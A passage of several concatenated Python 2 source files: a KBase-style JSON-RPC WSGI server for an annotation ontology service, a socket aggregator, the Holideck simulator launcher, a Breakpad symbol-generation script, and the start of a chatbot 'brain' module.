                # (the -1 accounts for ctx, which the caller does not supply)
                if len(params) < self._man_args(method) - 1:
                    raise InvalidParamsError('not enough arguments')
                # Does it have too many arguments?
                if(not self._vargs(method) and len(params) >
                        self._max_args(method) - 1):
                    raise InvalidParamsError('too many arguments')

                result = method(ctx, *params)
            elif isinstance(params, dict):
                # Do not accept keyword arguments if the jsonrpc version is
                # not >=1.1.  (versions are stored as ints: 11 == "1.1")
                if request['jsonrpc'] < 11:
                    raise KeywordError

                result = method(ctx, **params)
            else:  # No params
                result = method(ctx)
        except JSONRPCError:
            raise
        except Exception as e:
            # log.exception('method %s threw an exception' % request['method'])
            # Exception was raised inside the method.
            newerr = JSONServerError()
            newerr.trace = traceback.format_exc()
            if isinstance(e.message, basestring):
                newerr.data = e.message
            else:
                # Some exceptions embed other exceptions as the message
                newerr.data = repr(e.message)
            raise newerr
        return result

    def call_py(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in python
        object format or None if there is none.

        This method is same as call() except the return value is a python
        object instead of JSON string. This method is mainly only useful for
        debugging purposes.
        """
        rdata = jsondata
        # we already deserialize the json string earlier in the server code, no
        # need to do it again
        #        try:
        #            rdata = json.loads(jsondata)
        #        except ValueError:
        #            raise ParseError

        # set some default values for error handling
        request = self._get_default_vals()

        if isinstance(rdata, dict) and rdata:
            # It's a single request.
            self._fill_request(request, rdata)
            respond = self._handle_request(ctx, request)

            # Don't respond to notifications
            if respond is None:
                return None
            return respond
        elif isinstance(rdata, list) and rdata:
            # It's a batch.
            requests = []
            responds = []
            for rdata_ in rdata:
                # set some default values for error handling
                request_ = self._get_default_vals()
                self._fill_request(request_, rdata_)
                requests.append(request_)

            for request_ in requests:
                respond = self._handle_request(ctx, request_)
                # Don't respond to notifications
                if respond is not None:
                    responds.append(respond)

            if responds:
                return responds

            # Nothing to respond.
            return None
        else:
            # empty dict, list or wrong type
            raise InvalidRequestError

    def _handle_request(self, ctx, request):
        """Handles given request and returns its response."""
        # Optional per-method parameter type validation (Python 2 has_key).
        if self.method_data[request['method']].has_key('types'):  # noqa @IgnorePep8
            self._validate_params_types(request['method'], request['params'])

        result = self._call_method(ctx, request)

        # Do not respond to notifications.
        if request['id'] is None:
            return None

        respond = {}
        self._fill_ver(request['jsonrpc'], respond)
        respond['result'] = result
        respond['id'] = request['id']

        return respond
class MethodContext(dict):
    """Per-call context dict (client IP, user, method, provenance) with
    logging helpers bound to the service logger."""

    def __init__(self, logger):
        # All keys are populated later by the request handler / CLI driver.
        self['client_ip'] = None
        self['user_id'] = None
        self['authenticated'] = None
        self['token'] = None
        self['module'] = None
        self['method'] = None
        self['call_id'] = None
        self['rpc_context'] = None
        self['provenance'] = None
        # Levels accepted verbatim by log_debug; numeric levels 1-3 are
        # mapped to 7-9 instead.
        self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
        self._logger = logger

    def log_err(self, message):
        self._log(log.ERR, message)

    def log_info(self, message):
        self._log(log.INFO, message)

    def log_debug(self, message, level=1):
        if level in self._debug_levels:
            pass
        else:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            # Shift user levels 1-3 onto syslog debug levels 7-9.
            level = level + 6
        self._log(level, message)

    def set_log_level(self, level):
        self._logger.set_log_level(level)

    def get_log_level(self):
        return self._logger.get_log_level()

    def clear_log_level(self):
        self._logger.clear_user_log_level()

    def _log(self, level, message):
        # Route every message through the shared logger with call metadata.
        self._logger.log_message(level, message, self['client_ip'],
                                 self['user_id'], self['module'],
                                 self['method'], self['call_id'])

    def provenance(self):
        """Fetch provenance from the SDK callback server if one is
        configured, otherwise return the locally recorded provenance."""
        callbackURL = os.environ.get('SDK_CALLBACK_URL')
        if callbackURL:
            # OK, there's a callback server from which we can get provenance
            arg_hash = {'method': 'CallbackServer.get_provenance',
                        'params': [],
                        'version': '1.1',
                        'id': str(_random.random())[2:]
                        }
            body = json.dumps(arg_hash)
            response = _requests.post(callbackURL, data=body,
                                      timeout=60)
            response.encoding = 'utf-8'
            if response.status_code == 500:
                if ('content-type' in response.headers and
                        response.headers['content-type'] ==
                        'application/json'):
                    err = response.json()
                    if 'error' in err:
                        raise ServerError(**err['error'])
                    else:
                        raise ServerError('Unknown', 0, response.text)
                else:
                    raise ServerError('Unknown', 0, response.text)
            if not response.ok:
                response.raise_for_status()
            resp = response.json()
            if 'result' not in resp:
                raise ServerError('Unknown', 0,
                                  'An unknown server error occurred')
            return resp['result'][0]
        else:
            return self.get('provenance')
class ServerError(Exception):
    '''
    The call returned an error. Fields:
    name - the name of the error.
    code - the error code.
    message - a human readable error message.
    data - the server side stacktrace.
    '''

    def __init__(self, name, code, message, data=None, error=None):
        super(Exception, self).__init__(message)
        self.name = name
        self.code = code
        self.message = message if message else ''
        # 'data' is the JSON-RPC 2.0 field name, 'error' the 1.1 one.
        self.data = data or error or ''

    def __str__(self):
        header = '{0}: {1}. {2}'.format(self.name, str(self.code), self.message)
        return header + '\n' + self.data
def getIPAddress(environ):
    """Best-effort client IP from the WSGI environ.

    Honours the X-Forwarded-For / X-Real-IP proxy headers unless the
    service config explicitly sets dont_trust_x_ip_headers to 'true';
    falls back to the socket peer address.
    """
    trust_proxy_headers = config is None or \
        config.get('dont_trust_x_ip_headers') != 'true'

    if trust_proxy_headers:
        forwarded_for = environ.get('HTTP_X_FORWARDED_FOR')
        if forwarded_for:
            # First entry of the comma-separated chain is the origin client.
            return forwarded_for.split(',')[0].strip()
        real_ip = environ.get('HTTP_X_REAL_IP')
        if real_ip:
            return real_ip.strip()
    return environ.get('REMOTE_ADDR')
class Application(object):
    """WSGI application: registers the service methods with the JSON-RPC
    dispatcher, authenticates requests, and translates exceptions into
    JSON-RPC error responses."""
    # Wrap the wsgi handler in a class definition so that we can
    # do some initialization and avoid regenerating stuff over
    # and over

    def logcallback(self):
        # Keep the server log pointed at the (possibly rotated) user log file.
        self.serverlog.set_log_file(self.userlog.get_log_file())

    def log(self, level, context, message):
        self.serverlog.log_message(level, message, context['client_ip'],
                                   context['user_id'], context['module'],
                                   context['method'], context['call_id'])

    def __init__(self):
        submod = get_service_name() or 'annotation_ontology_api'
        self.userlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, changecallback=self.logcallback,
            config=get_config_file())
        self.serverlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, logfile=self.userlog.get_log_file())
        self.serverlog.set_log_level(6)
        self.rpc_service = JSONRPCServiceCustom()
        # Maps fully qualified method name -> 'required' | 'optional' | 'none'.
        self.method_authentication = dict()
        self.rpc_service.add(impl_annotation_ontology_api.get_annotation_ontology_events,
                             name='annotation_ontology_api.get_annotation_ontology_events',
                             types=[dict])
        self.method_authentication['annotation_ontology_api.get_annotation_ontology_events'] = 'optional'  # noqa
        self.rpc_service.add(impl_annotation_ontology_api.add_annotation_ontology_events,
                             name='annotation_ontology_api.add_annotation_ontology_events',
                             types=[dict])
        self.method_authentication['annotation_ontology_api.add_annotation_ontology_events'] = 'optional'  # noqa
        self.rpc_service.add(impl_annotation_ontology_api.status,
                             name='annotation_ontology_api.status',
                             types=[dict])
        authurl = config.get(AUTH) if config else None
        self.auth_client = _KBaseAuth(authurl)

    def __call__(self, environ, start_response):
        # Context object, equivalent to the perl impl CallContext
        ctx = MethodContext(self.userlog)
        ctx['client_ip'] = getIPAddress(environ)
        status = '500 Internal Server Error'

        try:
            body_size = int(environ.get('CONTENT_LENGTH', 0))
        except (ValueError):
            body_size = 0
        if environ['REQUEST_METHOD'] == 'OPTIONS':
            # we basically do nothing and just return headers
            status = '200 OK'
            rpc_result = ""
        else:
            request_body = environ['wsgi.input'].read(body_size)
            try:
                req = json.loads(request_body)
            except ValueError as ve:
                err = {'error': {'code': -32700,
                                 'name': "Parse error",
                                 'message': str(ve),
                                 }
                       }
                rpc_result = self.process_error(err, ctx, {'version': '1.1'})
            else:
                ctx['module'], ctx['method'] = req['method'].split('.')
                ctx['call_id'] = req['id']
                ctx['rpc_context'] = {
                    'call_stack': [{'time': self.now_in_utc(),
                                    'method': req['method']}
                                   ]
                }
                prov_action = {'service': ctx['module'],
                               'method': ctx['method'],
                               'method_params': req['params']
                               }
                ctx['provenance'] = [prov_action]
                try:
                    token = environ.get('HTTP_AUTHORIZATION')
                    # parse out the method being requested and check if it
                    # has an authentication requirement
                    method_name = req['method']
                    auth_req = self.method_authentication.get(
                        method_name, 'none')
                    if auth_req != 'none':
                        if token is None and auth_req == 'required':
                            err = JSONServerError()
                            err.data = (
                                'Authentication required for ' +
                                'annotation_ontology_api ' +
                                'but no authentication header was passed')
                            raise err
                        elif token is None and auth_req == 'optional':
                            pass
                        else:
                            try:
                                user = self.auth_client.get_user(token)
                                ctx['user_id'] = user
                                ctx['authenticated'] = 1
                                ctx['token'] = token
                            except Exception, e:
                                # Bad token only aborts 'required' methods;
                                # 'optional' methods continue anonymously.
                                if auth_req == 'required':
                                    err = JSONServerError()
                                    err.data = \
                                        "Token validation failed: %s" % e
                                    raise err
                    if (environ.get('HTTP_X_FORWARDED_FOR')):
                        self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
                                 environ.get('HTTP_X_FORWARDED_FOR'))
                    self.log(log.INFO, ctx, 'start method')
                    rpc_result = self.rpc_service.call(ctx, req)
                    self.log(log.INFO, ctx, 'end method')
                    status = '200 OK'
                except JSONRPCError as jre:
                    err = {'error': {'code': jre.code,
                                     'name': jre.message,
                                     'message': jre.data
                                     }
                           }
                    trace = jre.trace if hasattr(jre, 'trace') else None
                    rpc_result = self.process_error(err, ctx, req, trace)
                except Exception:
                    err = {'error': {'code': 0,
                                     'name': 'Unexpected Server Error',
                                     'message': 'An unexpected server error ' +
                                                'occurred',
                                     }
                           }
                    rpc_result = self.process_error(err, ctx, req,
                                                    traceback.format_exc())

        # print 'Request method was %s\n' % environ['REQUEST_METHOD']
        # print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
        # print 'Request body was: %s' % request_body
        # print 'Result from the method call is:\n%s\n' % \
        #    pprint.pformat(rpc_result)

        if rpc_result:
            response_body = rpc_result
        else:
            response_body = ''

        response_headers = [
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Headers', environ.get(
                'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
            ('content-type', 'application/json'),
            ('content-length', str(len(response_body)))]
        start_response(status, response_headers)
        return [response_body]

    def process_error(self, error, context, request, trace=None):
        """Attach id/version fields and the traceback to an error dict and
        serialize it, matching the request's JSON-RPC dialect."""
        if trace:
            self.log(log.ERR, context, trace.split('\n')[0:-1])
        if 'id' in request:
            error['id'] = request['id']
        if 'version' in request:
            # JSON-RPC 1.1-style request.
            error['version'] = request['version']
            e = error['error'].get('error')
            if not e:
                error['error']['error'] = trace
        elif 'jsonrpc' in request:
            # JSON-RPC 2.0-style request.
            error['jsonrpc'] = request['jsonrpc']
            error['error']['data'] = trace
        else:
            error['version'] = '1.0'
            error['error']['error'] = trace
        return json.dumps(error)

    def now_in_utc(self):
        # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
        dtnow = datetime.datetime.now()
        dtutcnow = datetime.datetime.utcnow()
        delta = dtnow - dtutcnow
        hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
                        60)
        return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
# Singleton WSGI application shared by uwsgi, the BaseHTTP server and the
# async CLI driver below.
application = Application()

# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
    import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
    # NOTE(review): ConfigParser values are strings, so any non-empty value
    # (even 'false') is truthy here — confirm the intended semantics.
    if config is not None and config.get('gevent_monkeypatch_all', False):
        print "Monkeypatching std libraries for async"
        from gevent import monkey
        monkey.patch_all()
    uwsgi.applications = {'': application}
except ImportError:
    # Not available outside of wsgi, ignore
    pass
# Handle of the server subprocess when started with newprocess=True.
_proc = None


def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system assigned port
    in the main thread. Excecution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    will also allow returning of the port number.'''
    global _proc
    if _proc:
        raise RuntimeError('server is already running')
    httpd = make_server(host, port, application)
    # port=0 asks the OS for a free port; read back the one assigned.
    port = httpd.server_address[1]
    print "Listening on port %s" % port
    if newprocess:
        _proc = Process(target=httpd.serve_forever)
        _proc.daemon = True
        _proc.start()
    else:
        # Blocks forever; `return port` below is only reached in the
        # newprocess case (or after the loop is interrupted).
        httpd.serve_forever()
    return port
def stop_server():
    """Terminate the server subprocess started via start_server(newprocess=True).

    Raises AttributeError if no server process is running (_proc is None).
    """
    global _proc
    _proc.terminate()
    _proc = None
def process_async_cli(input_file_path, output_file_path, token):
    """Run a single JSON-RPC request from a file and write the response.

    Used by the SDK async-job runner: reads the request from
    input_file_path, dispatches it through the shared `application`, and
    writes the JSON response to output_file_path.  Returns 0 on success,
    500 when the response carries an error.
    """
    exit_code = 0
    with open(input_file_path) as data_file:
        req = json.load(data_file)
    # Fill in defaults for fields the runner may omit.
    if 'version' not in req:
        req['version'] = '1.1'
    if 'id' not in req:
        req['id'] = str(_random.random())[2:]
    ctx = MethodContext(application.userlog)
    if token:
        user = application.auth_client.get_user(token)
        ctx['user_id'] = user
        ctx['authenticated'] = 1
        ctx['token'] = token
    if 'context' in req:
        ctx['rpc_context'] = req['context']
    ctx['CLI'] = 1
    ctx['module'], ctx['method'] = req['method'].split('.')
    prov_action = {'service': ctx['module'], 'method': ctx['method'],
                   'method_params': req['params']}
    ctx['provenance'] = [prov_action]
    resp = None
    try:
        resp = application.rpc_service.call_py(ctx, req)
    except JSONRPCError as jre:
        trace = jre.trace if hasattr(jre, 'trace') else None
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': jre.code,
                          'name': jre.message,
                          'message': jre.data,
                          'error': trace}
                }
    except Exception:
        trace = traceback.format_exc()
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': 0,
                          'name': 'Unexpected Server Error',
                          'message': 'An unexpected server error occurred',
                          'error': trace}
                }
    if 'error' in resp:
        exit_code = 500
    with open(output_file_path, "w") as f:
        f.write(json.dumps(resp, cls=JSONObjectEncoder))
    return exit_code
if __name__ == "__main__":
    # Async-CLI mode: <input_json> <output_json> [token-or-token-file].
    if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
            os.path.isfile(sys.argv[1])):
        token = None
        if len(sys.argv) == 4:
            if os.path.isfile(sys.argv[3]):
                with open(sys.argv[3]) as token_file:
                    token = token_file.read()
            else:
                token = sys.argv[3]
        sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
    # Server mode: optional --port / --host flags.
    try:
        opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
    except GetoptError as err:
        # print help information and exit:
        print str(err)  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print "Host set to %s" % host
        else:
            assert False, "unhandled option"

    start_server(host=host, port=port)
#    print "Listening on port %s" % port
#    httpd = make_server( host, port, application)
#
#    httpd.serve_forever()
|
aggregator.py | #!/usr/bin/env python
"""
Copyright (c) 2015-2018 The University of Tennessee and The University
of Tennessee Research Foundation. All rights
reserved."
This python script is the main script for the aggregator application.
@author Damien Genet
@email parsec-users@icl.utk.edu
"""
import socket
import sys, getopt
from threading import *
from time import sleep
import numpy
from iparam import iParam as iP
from data_handler import *
from aggregator_math_thread import *
from aggregator_simu_thread import *
from aggregator_gui_thread import *
from aggregator_database_thread import *
# Maximum number of pending (not-yet-accepted) connections on the socket.
C = 64


def socket_binding(s, port_number):
    """Bind socket `s` to this host on `port_number` and start listening;
    exits the process if the bind fails."""
    try:
        s.bind((socket.gethostname(), port_number))
    except socket.error as msg:
        # Python 2: socket.error is indexable as (errno, message).
        print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
        sys.exit()
    s.listen(C)  # keeps C pending connections
def accepting(s, Data, params):
    """Accept loop: hand each incoming connection to a worker thread.

    The first ';'-separated field of the client's greeting selects the
    handler: '1' -> simulation thread, '2' -> GUI thread.  A 5-second
    accept timeout lets the loop poll params.stop_event for shutdown.
    """
    s.settimeout(5.)
    while not params.stop_event.is_set():
        try:
            conn, addr = s.accept()
            data = conn.recv(2048)
            data = splitclean(data, ';')
            tmp = data[1:]
            params.debug(1,' >> --{0}--'.format(data))
            if '1' in data[0]:
                t = Thread(target=aggregator_simu_thread, args=(conn, addr, Data, params,tmp,))
                params.appendSimu(t)
                t.start()
            if '2' in data[0]:
                t = Thread(target=aggregator_gui_thread, args=(conn, addr, Data, params, tmp,))
                params.appendGui(t)
                t.start()
        except socket.timeout as msg:
            # Timeout just means "no connection yet": loop and re-check
            # the stop event.
            pass
def main(argv):
    """Entry point: start the optional DB thread, bind the listening socket,
    run the accept loop, and tear everything down on keypress."""
    params = iP()
    params.parseArgv(argv)
    Data = HashData(params)
    if params.db_name is not None:
        # The database thread signals readiness through this semaphore.
        sem = initSem(0)
        t = Thread(target=aggregator_database_thread, args=(Data, params, sem))
        t.start()
        params.db = t
        sem.acquire()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    socket_binding(s, params.getPort());
    print 'Listening on '+socket.gethostname()+' port ', params.getPort()
    t = Thread(target=accepting, args=(s, Data, params))
    params.accepting = t
    t.start()
    # Block until the operator presses a key, then stop all threads.
    print 'hit a key to stop!'
    st = raw_input(' > ')
    params.stop()
    params.join()
    s.close()
if __name__ == "__main__":
    # NOTE(review): sys.argv[:] includes the program name at index 0 —
    # confirm iParam.parseArgv expects that (getopt-style parsers usually
    # take sys.argv[1:]).
    main(sys.argv[:])
|
holideck.py | #!/usr/bin/python
#
"""
Holideck - Simulation and development enviornment for Holiday by MooresCloud
Homepage and documentation: http://dev.moorescloud.com/
Copyright (c) 2013, Mark Pesce.
License: MIT (see LICENSE for details)
"""
__author__ = 'Mark Pesce'
__version__ = '0.01-dev'
__license__ = 'MIT'
import sys, time
import ConfigParser
# Multiprocessing requires Python 2.6 or better
# Abort early on unsupported interpreters (Python 3, or Python < 2.6).
v = sys.version_info
if v[0] != 2 or v[1] < 6:
    print("holideck requires Python 2.6.x or Python 2.7.x -- aborting")
    sys.exit(0)
from multiprocessing import Process, Queue
import iotas.iotas
import simpype.simpype
if __name__ == '__main__':
    # Read the config file for port numbers
    try:
        config = ConfigParser.SafeConfigParser()
        config.read('holideck.config')
        spp_port = int(config.get('simpype', 'port'))
        iop_port = int(config.get('iotas', 'port'))
    except:
        # NOTE(review): bare except deliberately falls back to defaults on
        # any config problem (missing file, section, or bad int).
        spp_port = 8888  # If any error use default values
        iop_port = 8080

    # Create a Queue instance so the processes can share the datas
    q = Queue()

    # Start the simpype Process
    spp = Process(target=simpype.simpype.run, kwargs={ 'port': spp_port, 'queue': q})
    spp.start()
    #time.sleep(1)

    # Start the iotas Process and join it
    iop = Process(target=iotas.iotas.run, kwargs={ 'port': iop_port, 'queue': q})
    iop.start()
    time.sleep(1)
    print
    print "Simulator should be available on http://localhost:%d" % spp_port
    print "Web interface should be available on http://localhost:%d" % iop_port

    # Now we wait. When we get a control-C, we exit -- hopefully.
    while True:
        try:
            time.sleep(.1)
        except KeyboardInterrupt:
            # Tear down both child processes before exiting.
            print("\nTerminating simulator...")
            iop.terminate()
            spp.terminate()
            print("Exiting.")
            sys.exit(0)
|
generate_breakpad_symbols.py | #!/usr/bin/env python
# Copyright (c) 2013 GitHub, Inc.
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A tool to generate symbols for a binary suitable for breakpad.
Currently, the tool only supports Linux, Android, and Mac. Support for other
platforms is planned.
"""
import errno
import argparse
import os
import Queue
import re
import shutil
import subprocess
import sys
import threading
CONCURRENT_TASKS=4
def GetCommandOutput(command):
    """Runs the command list, returning its output.

    Prints the given command (which should be a list of one or more strings),
    then runs it and returns its output (stdout) as a string.

    From chromium_utils.
    """
    # Use a context manager so the devnull handle is closed even on error;
    # the original leaked one file descriptor per call.
    with open(os.devnull, 'w') as devnull:
        proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=devnull,
                                bufsize=1)
        output = proc.communicate()[0]
    return output
def GetDumpSymsBinary(build_dir=None):
    """Returns the path to the dump_syms binary."""
    # NOTE(review): the build_dir=None default is unusable —
    # os.path.expanduser(None) raises — so callers must always pass a
    # directory; confirm whether the default should be removed.
    DUMP_SYMS = 'dump_syms'
    dump_syms_bin = os.path.join(os.path.expanduser(build_dir), DUMP_SYMS)
    if not os.access(dump_syms_bin, os.X_OK):
        # Exit the whole tool: nothing can be dumped without dump_syms.
        print 'Cannot find %s.' % DUMP_SYMS
        sys.exit(1)
    return dump_syms_bin
def FindBundlePart(full_path):
    """Walk up from full_path to the nearest Mac bundle component.

    Returns the basename of the closest ancestor (or the path itself)
    ending in .dylib/.framework/.app, or '' when no such ancestor exists.
    """
    bundle_suffixes = ('.dylib', '.framework', '.app')
    path = full_path
    while path not in ('', '/'):
        if path.endswith(bundle_suffixes):
            return os.path.basename(path)
        path = os.path.dirname(path)
    return ''
def GetDSYMBundle(options, binary_path):
    """Finds the .dSYM bundle for the binary.

    Checks next to the binary first (absolute paths), then searches the
    build and libchromiumcontent directories by bundle name; falls back
    to returning the binary path itself.
    """
    if os.path.isabs(binary_path):
        candidate = binary_path + '.dSYM'
        if os.path.exists(candidate):
            return candidate

    bundle_name = FindBundlePart(binary_path)
    if bundle_name.endswith(('.dylib', '.framework', '.app')):
        for directory in (options.build_dir, options.libchromiumcontent_dir):
            candidate = os.path.join(directory, bundle_name) + '.dSYM'
            if os.path.exists(candidate):
                return candidate
    return binary_path
def GetSymbolPath(options, binary_path):
    """Finds the .dbg file for the binary, falling back to the binary itself."""
    candidate = os.path.join(options.libchromiumcontent_dir,
                             os.path.basename(binary_path)) + '.dbg'
    return candidate if os.path.exists(candidate) else binary_path
def Resolve(path, exe_path, loader_path, rpaths):
    """Resolve a dyld path.

    @executable_path is replaced with |exe_path|, @loader_path with
    |loader_path|, and @rpath with the first entry of |rpaths| under which
    the referenced file exists ('' if none does).
    """
    path = path.replace('@loader_path', loader_path)
    path = path.replace('@executable_path', exe_path)
    if '@rpath' not in path:
        return path
    for rpath in rpaths:
        candidate = Resolve(path.replace('@rpath', rpath), exe_path,
                            loader_path, [])
        if os.access(candidate, os.F_OK):
            return candidate
    return ''
def GetSharedLibraryDependenciesLinux(binary):
  """Return absolute paths to all shared library dependencies of the binary.

  This implementation assumes that we're running on a Linux system: it
  parses `ldd` output lines of the form '\tname => path (address)'.
  """
  lib_re = re.compile('\t.* => (.+) \(.*\)$')
  deps = []
  for line in GetCommandOutput(['ldd', binary]).splitlines():
    match = lib_re.match(line)
    if match:
      deps.append(os.path.realpath(match.group(1)))
  return deps
def GetSharedLibraryDependenciesMac(binary, exe_path):
  """Return absolute paths to all shared library dependencies of the binary.

  This implementation assumes that we're running on a Mac system.

  Args:
    binary: path of the Mach-O file to inspect with otool.
    exe_path: value substituted for @executable_path when resolving.
  """
  loader_path = os.path.dirname(binary)
  # First pass: collect the binary's LC_RPATH entries.  In `otool -l`
  # output the rpath value appears two lines after the 'cmd LC_RPATH' line.
  otool = GetCommandOutput(['otool', '-l', binary]).splitlines()
  rpaths = []
  for idx, line in enumerate(otool):
    if line.find('cmd LC_RPATH') != -1:
      m = re.match(' *path (.*) \(offset .*\)$', otool[idx+2])
      rpaths.append(m.group(1))
  # Second pass: list linked libraries and resolve the dyld placeholders
  # (@rpath/@loader_path/@executable_path) to concrete paths.
  otool = GetCommandOutput(['otool', '-L', binary]).splitlines()
  lib_re = re.compile('\t(.*) \(compatibility .*\)$')
  deps = []
  for line in otool:
    m = lib_re.match(line)
    if m:
      dep = Resolve(m.group(1), exe_path, loader_path, rpaths)
      if dep:
        deps.append(os.path.normpath(dep))
  return deps
def GetSharedLibraryDependencies(options, binary, exe_path):
  """Return absolute paths to all shared library dependencies of the binary.

  Dispatches to the Linux or Mac implementation and filters the result
  down to dependencies that actually exist on disk.  Exits the process
  on unsupported platforms.
  """
  deps = []
  if sys.platform.startswith('linux'):
    deps = GetSharedLibraryDependenciesLinux(binary)
  elif sys.platform == 'darwin':
    deps = GetSharedLibraryDependenciesMac(binary, exe_path)
  else:
    # Python 2 print statement; only Linux and macOS are supported.
    print "Platform not supported."
    sys.exit(1)
  result = []
  # NOTE(review): build_dir is computed but never used in this function.
  build_dir = os.path.abspath(options.build_dir)
  for dep in deps:
    if (os.access(dep, os.F_OK)):
      result.append(dep)
  return result
def mkdir_p(path):
  """Simulates mkdir -p: create path (and parents), tolerating existence."""
  try:
    os.makedirs(path)
  except OSError as e:
    # Swallow "already exists" only when the path really is a directory;
    # re-raise everything else (permissions, a file in the way, ...).
    if e.errno != errno.EEXIST or not os.path.isdir(path):
      raise
def GenerateSymbols(options, binaries):
  """Dumps the symbols of binary and places them in the given directory.

  Spawns options.jobs daemon worker threads that each pull binaries off a
  queue, run dump_syms and write .sym files into the breakpad store
  layout: <symbols_dir>/<module name>/<module id>/<module name>.sym.
  Blocks until every queued binary has been processed.
  """
  queue = Queue.Queue()
  print_lock = threading.Lock()
  def _Worker():
    while True:
      binary = queue.get()
      if options.verbose:
        with print_lock:
          # Serialize prints across workers.
          print "Generating symbols for %s" % binary
      # macOS symbols live in the .dSYM bundle; Linux debug info in a .dbg.
      if sys.platform == 'darwin':
        binary = GetDSYMBundle(options, binary)
      elif sys.platform == 'linux2':
        binary = GetSymbolPath(options, binary)
      syms = GetCommandOutput([GetDumpSymsBinary(options.build_dir), '-r', '-c',
                               binary])
      # The leading MODULE record carries the module id and name that
      # determine where the .sym file must be stored.
      module_line = re.match("MODULE [^ ]+ [^ ]+ ([0-9A-F]+) (.*)\n", syms)
      output_path = os.path.join(options.symbols_dir, module_line.group(2),
                                 module_line.group(1))
      mkdir_p(output_path)
      symbol_file = "%s.sym" % module_line.group(2)
      f = open(os.path.join(output_path, symbol_file), 'w')
      f.write(syms)
      f.close()
      queue.task_done()
  for binary in binaries:
    queue.put(binary)
  # Daemon threads so stuck workers don't block interpreter exit.
  for _ in range(options.jobs):
    t = threading.Thread(target=_Worker)
    t.daemon = True
    t.start()
  queue.join()
def main():
  """Parse arguments, expand the dependency closure and dump symbols.

  Returns:
    0 on success, 1 when any requested binary is missing/not executable.
  """
  parser = argparse.ArgumentParser(description='Generate Breakpad Symbols Project')
  parser.add_argument('--build-dir', required=True,
                      help='The build output directory.')
  parser.add_argument('--symbols-dir', required=True,
                      help='The directory where to write the symbols file.')
  parser.add_argument('--libchromiumcontent-dir', required=True,
                      help='The directory where libchromiumcontent is downloaded.')
  parser.add_argument('--binary', action='append', required=True,
                      help='The path of the binary to generate symbols for.')
  parser.add_argument('--clear', default=False, action='store_true',
                      help='Clear the symbols directory before writing new '
                           'symbols.')
  parser.add_argument('-j', '--jobs', default=CONCURRENT_TASKS, action='store',
                      type=int, help='Number of parallel tasks to run.')
  parser.add_argument('-v', '--verbose', action='store_true',
                      help='Print verbose status output.')
  options = parser.parse_args()
  # Every requested binary must exist and be executable before we start.
  for bin_file in options.binary:
    if not os.access(bin_file, os.X_OK):
      print "Cannot find %s." % options.binary
      return 1
  if options.clear:
    try:
      shutil.rmtree(options.symbols_dir)
    except:
      # Best effort: the directory may simply not exist yet.
      pass
  # Build the transitive closure of all dependencies.
  binaries = set(options.binary)
  queue = options.binary
  while queue:
    current_bin = queue.pop(0)
    exe_path = os.path.dirname(current_bin)
    deps = GetSharedLibraryDependencies(options, current_bin, exe_path)
    new_deps = set(deps) - binaries
    binaries |= new_deps
    queue.extend(list(new_deps))
  GenerateSymbols(options, binaries)
  return 0
if __name__ == '__main__':
  # Exit with main()'s return code when run as a script.
  sys.exit(main())
|
brain.py | from random import randint
import random
from Levenshtein import distance
from os import listdir
import json
from threading import Thread
from time import sleep
import re
# Import interface for basic convo file
from utils import convo_reader
from message_statistics import MessageStats
from utils import sentiment
from utils import iograb
# Setup global objects
myIO = iograb.ClaraIO()  # swap with the WebIO line below to serve over the web
#myIO = iograb.WebIO()
# Config load
configFile = open('config.json')  # NOTE(review): this handle is never closed
raw_data = configFile.read()
data = json.loads(raw_data)
# Emotion load
emotionFile = open('emotions.json')
raw_data = emotionFile.read()
emotions = json.loads(raw_data)
emotionFile.close()
# Append all conversation response around distributed conversation files
# This allows one to "plug-in" new responses and have them centralized together
convo = []
convoDir = data['convo_dir']
convoFiles = listdir(data['convo_dir'])
for i in convoFiles:
    if i.endswith('.json'):
        # JSON convo files already hold the canonical response structure.
        convoFile = open(convoDir + i)
        raw_data = convoFile.read()
        convo += json.loads(raw_data)
    elif i.endswith('.convo'):
        # Process the loose file format
        convoFile = open(convoDir + i)
        raw_data = convoFile.read()
        convo += convo_reader.convert_to_json(raw_data)
# Var Setup
VAR_REGISTRY = {}  # name -> value substitutions usable in response templates
def build_registry():
    """(Re)build the global substitution registry from config and emotions.

